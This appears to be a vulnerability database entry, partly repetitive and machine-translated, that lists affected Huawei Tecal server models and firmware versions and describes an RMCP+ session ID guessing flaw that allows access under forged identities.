Huawei Tecal RH1288 V2 V100R002C00SPC107 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285 V2 V100R002C00SPC115 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285H V2 V100R002C00SPC111 and earlier versions, Tecal RH2268 V2 V100R002C00, Tecal RH2288 V2 V100R002C00SPC117 and earlier versions, Tecal RH2288H V2 V100R002C00SPC115 and earlier versions, Tecal RH2485 V2 V100R002C00SPC502 and earlier versions, Tecal RH5885 V2 V100R001C02SPC109 and earlier versions, Tecal RH5885 V3 V100R003C01SPC102 and earlier versions, Tecal RH5885H V3 V100R003C00SPC102 and earlier versions, Tecal XH310 V2 V100R001C00SPC110 and earlier versions, Tecal XH311 V2 V100R001C00SPC110 and earlier versions, Tecal XH320 V2 V100R001C00SPC110 and earlier versions, Tecal XH621 V2 V100R001C00SPC106 and earlier versions, Tecal DH310 V2 V100R001C00SPC110 and earlier versions, Tecal DH320 V2 V100R001C00SPC106 and earlier versions, Tecal DH620 V2 V100R001C00SPC106 and earlier versions, Tecal DH621 V2 V100R001C00SPC107 and earlier versions, Tecal DH628 V2 V100R001C00SPC107 and earlier versions, Tecal BH620 V2 V100R002C00SPC107 and earlier versions, Tecal BH621 V2 V100R002C00SPC106 and earlier versions, Tecal BH622 V2 V100R002C00SPC110 and earlier versions, Tecal BH640 V2 V100R002C00SPC108 and earlier versions, Tecal CH121 V100R001C00SPC180 and earlier versions, Tecal CH140 V100R001C00SPC110 and earlier versions, Tecal CH220 V100R001C00SPC180 and earlier versions, Tecal CH221 V100R001C00SPC180 and earlier versions, Tecal CH222 V100R002C00SPC180 and earlier versions, Tecal CH240 V100R001C00SPC180 and earlier versions, Tecal CH242 V100R001C00SPC180 and earlier versions, Tecal CH242 V3 V100R001C00SPC110 and earlier versions could allow attackers to figure out the RMCP+ session IDs of users and access the system with forged identities. plural Huawei Tecal The product contains an information disclosure vulnerability.Information may be obtained. Huawei TecalRH1288V2 is a server of Huawei (Huawei) of China. There are security vulnerabilities in various Huawei servers. An attacker could exploit the vulnerability to gain access to the system by guessing the SessionID used by other users. Huawei Tecal RH1288 V2 and others are all servers of the Chinese company Huawei